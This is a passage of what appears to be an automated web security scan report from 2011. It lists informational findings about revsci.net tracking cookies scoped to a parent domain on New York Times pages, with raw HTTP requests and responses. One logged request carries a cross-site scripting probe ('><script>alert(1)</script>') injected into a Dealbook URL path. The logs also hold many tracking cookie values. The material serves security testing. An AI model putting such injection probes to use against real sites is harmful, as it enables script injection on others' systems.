GET /H07707/b3/0/3/0806180/702365539.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F1%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2G1n452bFHxwtTw/RbfPeaybhywI7lpKJyBxqoc6JAgR4scwc; rtc_ct15=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ct15=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2GxmXbnF6FwzLOQutobAqsf/spstzXxlFG6ck3Qo5/sFCwjE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
Set-Cookie: rtc_0tQm=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:47 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

13.69. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/71896167.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/71896167.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_Uh1H=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Uh1H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5OKmrgd3gbbjWobvkn1IXjnlu1LNJ9d4JolLatzGnQTLW0czBX79HxWvrpYxsDITCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadaV+PrsMX5NHgYvwPC5gr3Yt2y4CuwWsFZGNb3+plg+HE3zp9eW9A0fom4BiGY4s/G+Uwj6jX05Gl0Qb4rT+TEQk0Q7B9QZZ+lu3RJU3VgQGczhMSaKNrfE5RhrcghAxB/dxrxrGWb7yoqjCXYPgAFPnXybJE07o5ZvmunP1yxWgnOTs+Lp191ypAB+cu3wXMeWrEwZKB8YUlyEeFKlYq/5OiFPisDl6Pq7gbgu9ny1a2vN7mnU/D2s/dZDDyJi4vAVUTHNc/6KyEjrKhOqJr02DQ1eIBBo4c8qk5J42uboOq7ZTwHGjle1if9lmnJrWLswxPXzGWSxeYyS+X/wZb7iiVez1yQif50PjUrppERBb2Nwi4ozEc1oqpYkSui73c8ekn0F3f4J7nsue2TMg80ybtwr5GquG4CyNacrQeoG6+zSw2jlwxR63jfJucJVOtpwvNsv3/vCFZA8SlIa/By5Pi1ol/O1t73I6hYCDLAkh5a5gSJN8bOhcV7Cy1pDAdtLXCd14KZ6b49A0HII1WAMGx8NGSr4HBi+OokZjnabBEtrWICoGrQy3BTU7Cn0budshyY1UXCv38UT9DuZGC6wNYCZRxnPGzuYlihI38INQbEBwsTZhQnloZ9pXNVA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
Set-Cookie: rtc_CFSh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:16:13 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.70. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/747456476.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/747456476.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fprivate-equity%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/private-equity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=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; rtc_hiGv=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_hiGv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
Set-Cookie: rtc_xTlF=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:36:48 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_10678','H07707_11020','
...[SNIP]...

13.71. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/848419951.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/848419951.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F10%252Fapollo-to-buy-out-american-idol-owner%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="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"; rsi_us_1000000="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"; 
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_D9GE=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; rsi_segs_1000000=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; rtc_m6-a=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_D9GE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_m6-a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
Set-Cookie: rtc_cPyi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
